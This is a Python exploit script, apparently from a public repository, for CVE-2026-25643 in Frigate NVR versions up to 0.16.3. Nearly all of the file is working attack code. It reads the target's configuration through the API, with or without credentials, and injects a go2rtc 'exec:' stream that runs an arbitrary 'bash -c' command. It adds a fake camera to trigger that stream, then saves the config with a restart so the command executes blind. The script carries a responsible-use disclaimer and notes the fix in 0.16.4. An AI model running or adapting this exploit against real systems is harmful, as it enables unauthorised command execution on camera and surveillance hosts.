README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Frigate NVR ≤ 0.16.3 Blind RCE Exploit
CVE-2026-25643
This Python exploit targets a critical configuration manipulation vulnerability
in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths).
By injecting a malicious go2rtc stream and a fake camera entry,
it triggers arbitrary command execution as the Frigate process during service restart —
no reverse shell or output capture required.
Author: Joshua van der poll (https://github.com/joshuavanderpoll)
Created: February 2026
Version: 1.0
License: GNU General Public License v3.0 (GPL-3.0)
Disclaimer: Use responsibly. This is a proof-of-concept for a patched
vulnerability (fixed in Frigate ≥ 0.16.4). Do not use against
systems you do not own or have explicit permission to test.
Credits / References:
- jduardo2704/CVE-2026-25643-Frigate-RCE
Usage:
python3 exploit.py -u http://target:5000 -c "touch /tmp/pwned"
python3 exploit.py -u https://target -U admin -P password -c "id > /tmp/id.txt"
"""
import requests
import argparse
import sys
import json
import urllib3
import yaml
import time
# Silence urllib3's InsecureRequestWarning. Every HTTP call in this script is
# made with verify=False (certificate checks off), which would otherwise emit
# one warning per request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ANSI SGR escape sequences used to colorize terminal output.
# RESET must be appended after colored text to restore the default style.
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BLUE = '\033[94m'
CYAN = '\033[96m'
RESET = '\033[0m'
def print_status(msg, color=BLUE, symbol="[*]"):
    """Print one colorized status line of the form ``<symbol> <msg>``.

    Args:
        msg: Text to display.
        color: ANSI escape sequence emitted before the line (default: BLUE).
        symbol: Short tag shown in front of the message (default: ``[*]``).
    """
    line = "{}{} {}{}".format(color, symbol, msg, RESET)
    print(line)
def print_success(msg):
    """Print *msg* as a green ``[+]`` status line."""
    print_status(msg, color=GREEN, symbol="[+]")
def print_warning(msg):
    """Print *msg* as a yellow ``[!]`` status line."""
    print_status(msg, color=YELLOW, symbol="[!]")
def print_error(msg, exc=None):
    """Print *msg* as a red ``[-]`` status line, optionally with exception details.

    Args:
        msg: Human-readable description of what failed.
        exc: Optional exception instance. When given, its type name and
            message are printed, followed by a short traceback (at most two
            frames) written to stderr.
    """
    print_status(msg, RED, "[-]")
    if exc is not None:
        import traceback

        print(f" → {type(exc).__name__}: {exc}")
        # Print the traceback of the exception that was actually passed in.
        # traceback.print_exc() would instead report whatever exception is
        # currently being handled, which is "NoneType: None" when this
        # function is called outside an ``except`` block.
        traceback.print_exception(type(exc), exc, exc.__traceback__, limit=2)
def login_frigate(session, base_url, username, password):
    """POST the credentials to ``{base_url}/api/login`` using *session*.

    Args:
        session: Object exposing ``post(url, json=..., verify=..., timeout=...)``;
            the caller in this file passes a ``requests.Session``.
        base_url: Target base URL (no trailing slash).
        username: Value sent in the ``user`` field of the JSON body.
        password: Value sent in the ``password`` field of the JSON body.

    Returns:
        True when the server answers HTTP 200; False for any other status
        code or when the request raises.
    """
    print_status(f"Trying to authenticate as '{username}' ...")
    try:
        response = session.post(
            f"{base_url}/api/login",
            json={"user": username, "password": password},
            verify=False,
            timeout=12,
        )
        status = response.status_code
        print_status(f"Login → status code: {status}", CYAN)

        # Guard clause: report anything other than 200 and bail out.
        if status != 200:
            print_warning(f"Login failed - status: {status}")
            if response.text.strip():
                print(f" Response: {response.text[:180].strip()}")
            return False

        print_success("Login successful")
        return True
    except Exception as err:
        print_error("Login request failed", err)
        return False
def fetch_config(session, base_url):
    """Download the raw configuration and parse it into a dictionary.

    Issues a GET to ``{base_url}/api/config/raw``. The response body is parsed
    as YAML. If the body starts and ends with a double quote it is first
    decoded as a JSON string literal.

    Args:
        session: Object exposing ``get(url, timeout=..., verify=...)``; the
            caller in this file passes a ``requests.Session``.
        base_url: Target base URL (no trailing slash).

    Returns:
        The parsed configuration as a ``dict``, or ``None`` when the request
        fails, the status is not 200, the YAML is invalid, or the parsed
        document is not a mapping.
    """
    print_status("Fetching current configuration (/api/config/raw) ...")
    try:
        resp = session.get(f"{base_url}/api/config/raw", timeout=12, verify=False)
        print_status(f"Config fetch → HTTP {resp.status_code}", CYAN)
        if resp.status_code != 200:
            print_error(f"Cannot read config - status {resp.status_code}")
            if resp.text.strip():
                print(f" Body preview: {resp.text[:200]}")
            return None

        content = resp.text.strip()
        print_status(f"Received {len(content)} bytes", CYAN)

        # Handle possible JSON string wrapping or direct YAML
        if content.startswith('"') and content.endswith('"'):
            try:
                unwrapped = json.loads(content)
            except ValueError:
                # json.JSONDecodeError is a ValueError subclass. The body only
                # looked JSON-wrapped, so keep it as-is and let the YAML
                # parser decide. Catching ValueError rather than using a bare
                # ``except`` keeps Ctrl-C / SystemExit working.
                pass
            else:
                content = unwrapped
                print_status("Config was JSON-wrapped → unwrapped", CYAN)

        try:
            config = yaml.safe_load(content)
        except yaml.YAMLError as e:
            print_error("YAML parsing failed", e)
            print(f" Raw content preview: {content[:300]}")
            return None

        if not isinstance(config, dict):
            print_error("Parsed config is not a dictionary")
            return None
        print_success(f"Config parsed successfully ({len(config)} top-level keys)")
        return config
    except Exception as e:
        print_error("Failed to fetch/parse configuration", e)
        return None
def send_config(session, base_url, config_data, save_option="restart"):
    """Serialize *config_data* to YAML and POST it to the config-save endpoint.

    The request goes to ``{base_url}/api/config/save`` with *save_option*
    passed as a query parameter and the YAML text as a ``text/plain`` body.
    The outcome is only reported on the console; nothing is returned.

    Args:
        session: Object exposing ``post(...)``; the caller in this file passes
            a ``requests.Session``.
        base_url: Target base URL (no trailing slash).
        config_data: Configuration mapping to serialize.
        save_option: Value of the ``save_option`` query parameter.
    """
    body = yaml.dump(config_data, allow_unicode=True, sort_keys=False)
    size_in_bytes = len(body.encode())
    print_status(f"Sending modified config ({size_in_bytes:,} bytes) with option: {save_option}")
    try:
        reply = session.post(
            f"{base_url}/api/config/save?save_option={save_option}",
            data=body,
            headers={"Content-Type": "text/plain"},
            timeout=10,
            verify=False,
        )
        print_status(f"Config save → HTTP {reply.status_code}", CYAN)
        if reply.status_code not in (200, 204):
            print_warning(f"Config rejected - status {reply.status_code}")
            if reply.text.strip():
                print(f" Server response: {reply.text[:300].strip()}")
        else:
            print_success("Configuration accepted (server should restart)")
    except requests.Timeout:
        print_warning("Request timed out - server might be restarting already")
    except Exception as err:
        print_error("Failed to send modified configuration", err)
def inject_command_into_config(config, command):
    """Add the ``debug_cmd`` stream and ``trigger_exec`` camera to *config*.

    The mapping is modified in place: missing ``go2rtc``/``streams`` and
    ``cameras`` sections are created, then the two entries are written
    (overwriting any existing entries with the same names).

    Args:
        config: Parsed configuration mapping to modify.
        command: Command string embedded into the stream definition.

    Returns:
        The same *config* object that was passed in.
    """
    print_status(f"Preparing payload → executing: {command}")
    payload = f"bash -c '{command}'"
    print_status(f"Using payload: {payload}", CYAN)

    # go2rtc → streams
    if 'go2rtc' not in config:
        config['go2rtc'] = {}
    go2rtc_section = config['go2rtc']
    if 'streams' not in go2rtc_section:
        go2rtc_section['streams'] = {}
    go2rtc_section['streams']['debug_cmd'] = [f"exec:{payload}"]
    print_success("Injected malicious stream → debug_cmd")

    # Camera entry whose only input points at the stream defined above
    camera_input = {
        'path': 'rtsp://127.0.0.1:8554/debug_cmd',
        'roles': ['detect'],
    }
    camera_entry = {
        'ffmpeg': {'inputs': [camera_input]},
        'detect': {'enabled': False},
        'audio': {'enabled': False},
        'enabled': True,
    }
    if 'cameras' not in config:
        config['cameras'] = {}
    config['cameras']['trigger_exec'] = camera_entry
    print_success("Injected trigger camera → trigger_exec")
    return config
def exploit_command(base_url, username, password, command):
    """Run the full sequence: optional login, fetch config, modify, send.

    Exits the process with status 1 when the configuration cannot be fetched
    or the modified configuration cannot be prepared. The result of the login
    attempt is not checked; the sequence continues either way.

    Args:
        base_url: Target base URL (no trailing slash).
        username: Login name, or a falsy value to skip authentication.
        password: Login password, or a falsy value to skip authentication.
        command: Command string passed to ``inject_command_into_config``.
    """
    session = requests.Session()
    session.verify = False

    # Authentication (only attempted when both credentials are present)
    if not (username and password):
        print_warning("No credentials provided → attempting unauthenticated access")
    else:
        login_frigate(session, base_url, username, password)

    # Get current config
    current_config = fetch_config(session, base_url)
    if not current_config:
        print_error("Exploit aborted - cannot continue without valid config")
        sys.exit(1)

    # Modify config with our command
    try:
        modified_config = inject_command_into_config(current_config, command)
    except Exception as err:
        print_error("Failed to prepare malicious config", err)
        sys.exit(1)

    # Small delay
    time.sleep(1.2)

    # Send modified config
    send_config(session, base_url, modified_config)

    separator = "=" * 60
    summary_lines = (
        "\n" + separator,
        f" {GREEN}Payload sent! Command should execute during go2rtc init / camera probe.{RESET}",
        " Keep in mind:",
        " • Output is NOT captured (blind execution)",
        " • Command runs as the user/frigate process",
        " • Multiple executions may occur during restart",
        separator + "\n",
    )
    for summary_line in summary_lines:
        print(summary_line)
def main():
    """Parse command-line arguments, print a run summary and start the run.

    Exit codes set here: 2 when interrupted with Ctrl-C, 3 on any other
    unexpected exception raised by ``exploit_command``.
    """
    parser = argparse.ArgumentParser(
        description="Frigate <= 0.16.3 RCE – execute blind command (CVE-2026-25643)"
    )
    # (short flag, long flag, required, help text)
    option_table = (
        ('-u', '--url', True, "Target URL (http(s)://host:port)"),
        ('-U', '--username', False, "Username (optional)"),
        ('-P', '--password', False, "Password (optional)"),
        ('-c', '--cmd', True, "Command to execute on target"),
    )
    for short_flag, long_flag, is_required, help_text in option_table:
        parser.add_argument(short_flag, long_flag, required=is_required, help=help_text)
    args = parser.parse_args()

    base_url = args.url.rstrip('/')

    print(f"\n {BLUE}Target :{RESET} {base_url}")
    if args.username:
        print(f" {BLUE}User :{RESET} {args.username}")
    print(f" {BLUE}Command:{RESET} {args.cmd}\n")

    try:
        exploit_command(
            base_url=base_url,
            username=args.username,
            password=args.password,
            command=args.cmd,
        )
    except KeyboardInterrupt:
        print_warning("Interrupted by user")
        sys.exit(2)
    except Exception as err:
        print_error("Unexpected fatal error", err)
        sys.exit(3)
# Run the CLI only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()